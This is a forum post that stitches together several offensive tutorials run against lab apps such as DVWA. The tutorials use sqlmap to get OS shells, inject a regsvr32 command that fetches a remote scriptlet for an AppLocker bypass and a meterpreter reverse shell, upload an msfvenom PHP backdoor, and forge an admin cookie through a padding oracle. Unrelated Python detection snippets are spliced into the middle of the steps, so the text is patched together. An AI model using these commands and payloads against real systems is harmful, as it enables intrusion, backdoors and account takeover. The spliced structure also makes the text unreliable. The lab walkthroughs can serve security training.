Printable Version - Bhcforums.cc (https://bhcforums.cc/Thread-Guide-How-to-Exploiting-the-Webserver-using-Sqlmap-and-Metasploit-OS-Pwn)
[Guide] How to Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn) - NINZA - 04-25-2020

This article is about how to use sqlmap for SQL injection to hack the victim PC and gain shell access. Here I performed the SQL attack to gain three different types of shell (meterpreter, command shell and VNC).

Now open DVWA in your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low. From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in the text box. Don't click on the submit button without setting the browser proxy; set your browser proxy so that Burp Suite works properly.

Turn on Burp Suite, click on Proxy in the menu bar and set "Intercept is on". Come back and click on the submit button in DVWA. Burp Suite will show the "cookie" and "referer" headers in the captured request, which will be used later in the sqlmap commands.

Let's enumerate all database names using the referer and cookie values in the sqlmap command:

```
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs
```

It has dumped all the database names. Now I am going to choose dvwa to access its back-end database management system.

Now type the following command to access the shell of the web server and follow the screenshots:

```
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
```

Type 1 for Metasploit framework to establish a reverse connection, then type 4 for the PHP payload supported by the server, and again type 1 for the common location of a writable directory to upload the payload as a backdoor on the victim PC. Here type 1 for reverse TCP connection as the default option.
Now I will choose these three payloads one by one and try to hack the web server each time. Type 1 for meterpreter. It will load the Metasploit framework and provide meterpreter session 1.

Repeat the whole process up to the reverse TCP connection; when it asks to choose a payload, type 2 for the shell. Again it will load the Metasploit framework and provide command shell session 1.

Repeat the whole process up to the reverse TCP connection; when it asks to choose a payload, this time type 3 for VNC. Again it will load the Metasploit framework and launch the viewer. Here you can see from the given screenshot that I have accessed the victim PC through TightVNC, and now the victim's every moment will be kept under my observation. Hence we have hacked the victim PC three times with various types of shell.

In this article, we will see how to perform command injection using sqlmap and try to execute any cmd command through sqlmap if the web server has a SQL injection vulnerability.

Now open DVWA in your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low. From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in the text box. Don't click on the submit button without setting the browser proxy; set your browser proxy so that Burp Suite works properly.

Turn on Burp Suite, click on Proxy in the menu bar and set "Intercept is on". Come back and click on the submit button in DVWA. Burp Suite will show the "cookie" and "referer" headers in the captured request, which will be used later in the sqlmap commands.

Let's enumerate all database names using the referer and cookie values in the sqlmap command:

```
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs
```

As the screenshot shows, it has dumped all the database names. Now we are going to choose dvwa for the command injection attack.

Now open another terminal for the Metasploit framework and type msfconsole. The regsvr32_applocker_bypass_server module simplifies the Regsvr32.exe application whitelisting bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 requests the .sct file and then executes the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and the PowerShell download-and-execute) can occur on the same port.
```
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit
```

The above module will generate malicious code as a DLL file. Copy the selected part for the DLL file and then run this malicious code using the sqlmap command.

Now we are going to execute the DLL file through a CMD command using sqlmap, so paste the above malicious code into the sqlmap command as shown in the image given below:

```
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"
```

Then type 4 for the PHP payload and type 1 for a common location to upload the payload as a backdoor on the victim PC. As soon as the command executes, come back to the Metasploit framework and you will get meterpreter session 1 opened.
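The regsvr32 invocation above (a remote .sct fetched through scrobj.dll, launched from a database or web-server process rather than a user session) is exactly what endpoint telemetry should alert on. This is an added example, not code from the original post: a small triage function over constructed Sysmon-style process-creation records; the server-parent and LOLBin lists, and mysqld.exe as the parent of the injected command, are assumptions.

```python
import re

# Remote scriptlet loaded via "regsvr32 /i:<url> scrobj.dll": the exact shape of
# the command the tutorial above injects through sqlmap --os-cmd.
REMOTE_SCT_RE = re.compile(r"/i:\s*https?://\S+", re.IGNORECASE)
# Server processes that have no business spawning these binaries (assumed lists).
SERVER_PARENTS = {"httpd.exe", "apache.exe", "php-cgi.exe", "mysqld.exe", "sqlservr.exe", "w3wp.exe"}
LOLBINS = {"regsvr32.exe", "cmd.exe", "powershell.exe"}

def evaluate(event):
    """Return (severity, tags) for one Sysmon-style process-creation record."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    tags = []
    if image == "regsvr32.exe":
        if REMOTE_SCT_RE.search(cmd):
            tags.append("remote-scriptlet")      # /i:http(s)://... is the key signal
        if "scrobj.dll" in cmd.lower():
            tags.append("scrobj")
    if parent in SERVER_PARENTS and image in LOLBINS:
        tags.append("server-spawned-lolbin")    # DB or web server launching a shell
    if "remote-scriptlet" in tags:
        return "high", tags
    return ("medium" if tags else "none"), tags

def alerts(events):
    """Keep only the records worth a ticket, as (severity, tags, command line)."""
    out = []
    for e in events:
        sev, tags = evaluate(e)
        if sev != "none":
            out.append((sev, tags, e.get("CommandLine", "")))
    return out

# Constructed records (not real telemetry) modelled on the XAMPP/DVWA lab above.
SAMPLE_EVENTS = [
    # benign COM registration by an installer: local DLL, no /i:<url>
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Vendor\setup.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Vendor\widget.dll"'},
    # the command from the tutorial; mysqld.exe as parent is an assumption
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\xampp\mysql\bin\mysqld.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"},
    # web server spawning cmd.exe, as the uploaded PHP file stager would
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]
```

Run `alerts(SAMPLE_EVENTS)` to see the two records that fire; the benign installer registration is left alone because it loads a local DLL from a non-server parent.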
```
sessions -i 1
meterpreter > sysinfo
```

Hey guys!! You may have used sqlmap multiple times for SQL injection to get database information from the web server. Here in this tutorial, I will show you how to upload any backdoor to get a meterpreter session if the website suffers from a SQL injection vulnerability.

Table of Content

Navigate to Page Vulnerable to SQL Injection
Intercept the Browser Request
Extracting Database Name
Spawning os-shell
Explore File Stager in the Browser
Generating PHP Backdoor
Upload & Execute Msfvenom PHP Backdoor
Obtain Meterpreter Shell
Navigate to Page Vulnerable to SQL Injection

Now let's navigate to DVWA through a web browser and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low. From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in the text box. Don't click on the submit button without setting the web browser proxy; set your browser proxy so that Burp Suite works properly.

Intercept the Browser Request

Now let's intercept the browser request with the following steps:
Extracting Database Name

Now use sqlmap for SQL injection and run the following command to enumerate the database name:

```
sqlmap -r file --dbs --batch
```

Here the -r option tells sqlmap to read the HTTP request from "file", and as you can observe it has dumped dvwa as the database name.

Spawning os-shell

Now type the following command to run sqlmap and access the os-shell of the web server (dvwa):

```
sqlmap -r file -D dvwa --os-shell
```

It will try to generate a backdoor; if you want to upload a PHP backdoor inside the web server then type 4 for the PHP payload. Type 4 for brute force search to find a writable directory to upload it to. It tries to upload the file to "/xampp/htdocs/" using SQL injection techniques. As soon as the file is uploaded it reports INFO "the file stager has been successfully uploaded on /xampp/htdocs/" and you get the os-shell of the victim PC. It also shows the path of the file stager, where you can manually upload your backdoor; look at the highlighted URL in the screenshot.

Explore File Stager in the Browser

Open the URL http://192.168.1.105/tmpurufu.php in the browser. From the screenshot below you can read the heading of the web page, "sqlmap file uploader", which lets you browse for your backdoor and later upload it to the /xampp/htdocs/ directory of the web server (dvwa).

Generating PHP Backdoor

Let's prepare the malicious PHP file with msfvenom that we can upload:

```
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
```

Copy the code from <?php to die() and save it in a file with the .php extension. I have saved the backdoor as shell.php on the desktop and will later browse to this file to upload it to the web server.
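Everything sqlmap did in the steps above also lands in the web server's access log: its self-identifying default User-Agent, the injection probes in the id parameter, and the requests to the tmpu....php file stager dropped in the webroot. This is an added example, not part of the original tutorial: a classifier over constructed Apache combined-format lines; the stager name pattern generalizes the tmpurufu.php seen above (an assumption), and the probe regex is this example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log format (regex written for this example).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# sqlmap --os-shell drops its file stager in the webroot; the tutorial above shows
# it as tmpurufu.php, and this pattern generalizes that name (an assumption).
STAGER_RE = re.compile(r"^/tmpu[a-z0-9]{4}\.php$", re.IGNORECASE)
# Boolean-, union- and time-based probes as they look after URL decoding.
PROBE_RE = re.compile(
    r"""['"]\s*(AND|OR)\s|UNION\s+(ALL\s+)?SELECT|SLEEP\s*\(|BENCHMARK\s*\(""", re.IGNORECASE
)

def classify(line):
    """Return the finding tags for one access-log line ([] if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    path, _, query = m["path"].partition("?")
    tags = []
    if "sqlmap" in m["ua"].lower():          # sqlmap's default User-Agent names itself
        tags.append("sqlmap-user-agent")
    if PROBE_RE.search(unquote_plus(query)):
        tags.append("sqli-probe")
    if STAGER_RE.match(path):
        tags.append("sqlmap-file-stager")
    return tags

def summarize(log_text):
    """Aggregate finding tags per client IP over a whole log."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        tags = classify(line)
        if m and tags:
            per_ip[m["ip"]].update(tags)
    return {ip: dict(c) for ip, c in per_ip.items()}

# Constructed lines modelled on the DVWA lab above (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Apr/2020:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&submit=submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2020:10:01:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1--%20&submit=submit HTTP/1.1" 200 4321 "-" "sqlmap/1.4 (http://sqlmap.org)"
203.0.113.7 - - [25/Apr/2020:10:02:30 +0000] "POST /tmpurufu.php HTTP/1.1" 200 512 "-" "sqlmap/1.4 (http://sqlmap.org)"
198.51.100.4 - - [25/Apr/2020:10:03:00 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""
```

`summarize(SAMPLE_LOG)` attributes all three findings to the single scanning client; the User-Agent check is trivial to evade with --random-agent, so the probe and stager signals are the ones worth keeping.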
On the other hand, load the Metasploit framework by typing msfconsole and start multi/handler.

Upload & Execute Msfvenom PHP Backdoor

Click on the browse tab to select your backdoor file (shell.php) and then click on upload. GREAT!!! Here it shows "Admin File is uploaded", which means the backdoor shell.php is uploaded.

To execute the backdoor file on the target machine, open the URL 192.168.1.105/shell.php in the browser and you will receive a reverse connection through multi/handler.

Obtain Meterpreter Shell

```
msf > use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
```

Divine!!! Here we have got our meterpreter session 1.

The main purpose of solving this lab was to share the padding oracle attack technique with our visitors. The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key or the cipher used, by sending skilfully manipulated ciphertexts to the padding oracle and observing the results it returns. This causes a loss of confidentiality of the encrypted data; for example, in the case of session data stored on the client side, the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plaintexts without knowledge of the user key and cipher. If the application assumes that the integrity and authenticity of the decrypted data are given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.

First, you need to download the padding oracle lab image.
Now install the ISO image in VMware and start it. Start Kali Linux as well and browse to the target IP 192.168.1.29. At this point you need to create a user account, so click on the register option.

Now register a username with its password and then log in to exploit this vulnerability. I registered as raj: 123.

Once you have created a user account, go to the login panel and at the same time use Burp Suite to capture the cookies. Turn on Burp Suite and don't forget to set the manual proxy of your browser. Now open the Proxy tab and click the "Intercept is on" button to capture the request to the target. When this is done you will see the captured data in the intercept window. Here you will find that I tried to log in with the credentials raj: 123.

Now right-click on this window and a list of options will appear; click on "Send to Repeater". In the screenshot you will find two panels, left and right, for request and response respectively. In the left panel send username raj and password 123 as the request and click on the GO button to forward it, which will generate a cookie for auth as the response in the right panel. Copy the highlighted cookie; it will be used in the command below.

Next open a terminal to run the command shown in the given image, which contains the target URL and the cookie copied above. Python padding oracle is a Python implementation heavily based on PadBuster, an automated script for performing padding oracle attacks, developed by Brian Holyfield of Gotham Digital Science. This command will decrypt the encrypted value of auth into plaintext. Further, type 2 where it asks for the recommended ID.

The last part of the screenshot has captured the three decrypted values in Base64, hex and ASCII. The auth cookie is a combination of the username and its password; from PadBuster we come to know what the encrypted value of the username raj is.

We are very near to our goal; just encrypt this auth cookie with the user as admin once again.
Here we have our plaintext as admin; let's encode it using PadBuster. Further, type 2 where it asks for the recommended ID. Here the highlighted part is our encrypted value for admin. Copy it: "BAit——–AAAA".

Go to Burp Suite once again and click on Params under the intercept frame; it contains two fields, username and password, so now add a third field for the auth value. Click on the ADD button on the right side of the frame, which will add another row in Params.

Here it has three columns: type, name and value. Paste the above encrypted value in these columns as type: cookie, name: auth, value: BAit——AAAAAA, which we got from PadBuster. Then click on Forward to send this request to the web server. Again click on Forward to send it.

Once the request is sent by Burp Suite to the web server you will be logged in as the admin account. Congrats!!! We have met the goal of this lab.